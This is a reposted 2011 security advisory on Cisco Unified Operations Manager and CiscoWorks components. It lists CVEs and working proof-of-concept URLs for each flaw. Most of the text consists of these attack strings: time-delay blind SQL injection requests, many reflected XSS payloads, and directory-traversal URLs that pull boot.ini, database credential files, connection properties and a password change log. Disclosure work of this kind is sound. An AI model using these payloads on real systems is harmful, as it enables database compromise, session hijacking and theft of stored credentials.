Cisco Unified Operations Manager Multiple Vulnerabilities

19/05/2011 Categoría NoRepublicar

#Cisco Unified Operations Manager Multiple #Vulnerabilities

Cisco Unified Operations Manager (CuOM) is a NMS for voice developed by Cisco Systems. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network.

Multiple vulnerabilities have been identified in Cisco Unified Operations Manager and associated products. These vulnerabilities include multiple blind SQL injections, multiple XSS. and a directory traversal vulnerability.

1. Blind SQL injection vulnerabilities that affect CuOM
CVE-2011-0960 (CSCtn61716):
The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call:
/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs=’waitfor%20 delay’0:0:20′–&Extns=&IPs=

Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote:
/iptm/TelePresenceReportAction.do?ccm=’waitfor%20delay’0:0:20′–

2. Reflected XSS vulnerabilities that affect CuOM CVE-2011-0959 (CSCtn61716):
/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
/iptm/ddv.do?deviceInstanceName=f3806″%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c06d&deviceCapability=deviceCap
/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)/script>542256870d5&viewname=device.filter&operation=getFilter&dojo.preventCache=129851
8961028
/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)/script>09520eb762c&dojo.preventCache=1298518963370
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84″%3balert(1)//608ddbf972
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8″%3balert(1)//79877affe89
/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1″%3balert(1)//cda6137ae4c
/iptm/logicalTopo.do?clusterName=db4c1″%3balert(1)//4031caf63d7

Reflected XSS vulnerability that affect Common Services Device CenterCVE-2011-0962 (CSCto12712):
/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b”%3balert(1)//4e9adfb2987

Reflected XSS vulnerability that affects Common Services FrameworkHelp Servlet CVE-2011-0961 (CSCto12704):
/cwhp/device.center.do?device=&72a9f“><script>alert(1)</script>5f5251aaad=1

3. Directory traversal vulnerability that affects CiscoWorks HomepageCVE-2011-0966 (CSCto35577):
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties

DB connection info for all databases:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties
Note: When reading large files such as this file, ensure the row
limit is adjusted to 500 for example.
DB password change log:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\log\dbpwdChange.log